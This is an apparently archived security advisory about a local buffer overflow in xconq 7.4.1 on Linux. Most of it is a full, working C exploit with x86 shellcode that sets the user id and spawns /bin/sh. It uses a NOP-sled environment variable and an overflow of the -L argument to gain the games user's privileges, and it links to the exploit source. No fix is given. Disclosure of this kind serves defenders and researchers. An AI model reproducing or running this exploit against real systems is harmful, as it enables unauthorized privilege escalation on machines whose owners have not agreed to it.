COMMAND

    xconq

SYSTEMS AFFECTED

    xconq 7.4.1

PROBLEM

    Chris Sharp  found following.   He saw  some mention  of xconq  on
    bugtraq, but no exploit. decided  to take a lookie at  it...took a
    little more work than expected to successfully exploit (without  a
    display), but none-the-less original(unwarpped/working):

        http://realhalo.org/xxconq.c

    This exploit has been built  and tested on slackware.   Some other
    overflowable functions  Chris mentioned  are the  -g parameter and
    the  XCONQLIB  environmental  variable,   both  of those overflows
    require a display to exploit.

    This program also has an odd usage of setuid(); in it to drop  its
    privileges  --  making  it  possible  to  break.   And  yes, Chris
    squished the code together on purpose.

    Here is the copy of code (wrapped):

    /*     (linux)xconq[v7.4.1]     local     buffer     overflow,     by:
    v9[v9@fakehalo.org].   this  will   give  you  uid=games  on   systems
    with xconq.   i originally  wrote this  exploit for  the -g parameter.
    but,  via  the  -g  parameter  you  must  have  a display.  via ths -L
    parameter you do not  need a display, but  it is much more  exact.  in
    this method you  have to fill  the XCONQCONFIG environmental  variable
    to  a  certain  point  to  be  able  to  overwrite  the eip via the -L
    parameter.  (64 bytes is more  than enough).  i also needed  to modify
    some shellcode for  this.  all  in all, too  much work for  what it is
    worth.
    
    */
    #define PATH "/usr/local/bin/xconq"     // path to xconq7.4.1.
    #define DEFAULT_ALIGN 0                 // generic alignment.
    #define DEFAULT_OFFSET -5000            // generic offset. (from bufsize)
    #define DEFAULT_UID 20                  // user id of games.
    #define DEFAULT_CAP 507                 // exact buffer cut off point.
    #define FILLER 0x78                     // filling character, for misc use.
    static char exec[]= // setreuid()+exec(): v9@fakehalo.org.
    
    "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"
    "\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"
    "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
    "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
     "\x69\x6e\x2f\x73\x68\x01";
    long esp(void){__asm__("movl %esp,%eax");}
    int main(int argc,char **argv){ char bofeip[512],env[4096],push[64];int i,offset,align,uid,cap;long ret;
     printf("[ (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]"
     ". ]\n");
    
    if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){
      printf("*** [syntax]: %s [offset] [alignment]
    [user id] [capoff buffer value"  "].\n",argv[0]);
      printf("*** [required]: argument alignment value must be: 0-3.\n");
      printf("*** [required]: argument user id value must be: 1-255.\n");
      printf("*** [required]: argument cap value must be: 1-%d.\n",sizeof(bofeip));
      exit(0);
     }
    
    if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
     if(argc>2){
      if(atoi(argv[2])>3||atoi(argv[2])<0){
       printf("*** [error]: ignored argument alignment value: %s. (use 0-3)\n",
       argv[2]);align=DEFAULT_ALIGN;
      }
      else{align=atoi(argv[2]);}
     }
     else{align=DEFAULT_ALIGN;}
     if(argc>3){
      if(atoi(argv[3])<1||atoi(argv[3])>255){
       printf("*** [error]: ignored argument uid value: %s. (use 1-255)\n",
       argv[3]);uid=DEFAULT_UID;
      }
      else{uid=atoi(argv[3]);}
     }
     else{uid=DEFAULT_UID;}
     if(argc>4){
    
    if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
       printf("*** [error]: ignored argument cap value: %s. (use 1-%d)\n",argv[4],
       sizeof(bofeip));cap=DEFAULT_CAP;
      }
      else{cap=atoi(argv[4]);}
     }
     else{cap=DEFAULT_CAP;}
    
    ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
     for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long*)&bofeip[i]=ret;}
     bofeip[cap]=0x0;
    
    for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}
    
    exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
     env[(i+strlen(exec))]=0x0;printf("*** [data]: addr: 0x%lx, offset: %d, alignm"
     "ent: %d, uid: %d, cap: %d.\n*** [data]: sizeof(bofeip): %d, sizeof(env): %d,"
     " sizeof(push): %d, nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),
    
    sizeof(env),sizeof(push),(strlen(env)-strlen((char*)strrchr(env,0x90))+1));
    
    setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));
    
    push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
     if(execl(PATH,PATH,"-L",bofeip,0)){
      printf("*** [error]: could not execute %s
    properly.\n",argv[0]);
      exit(-1);
     }
    }

SOLUTION

    Nothing yet.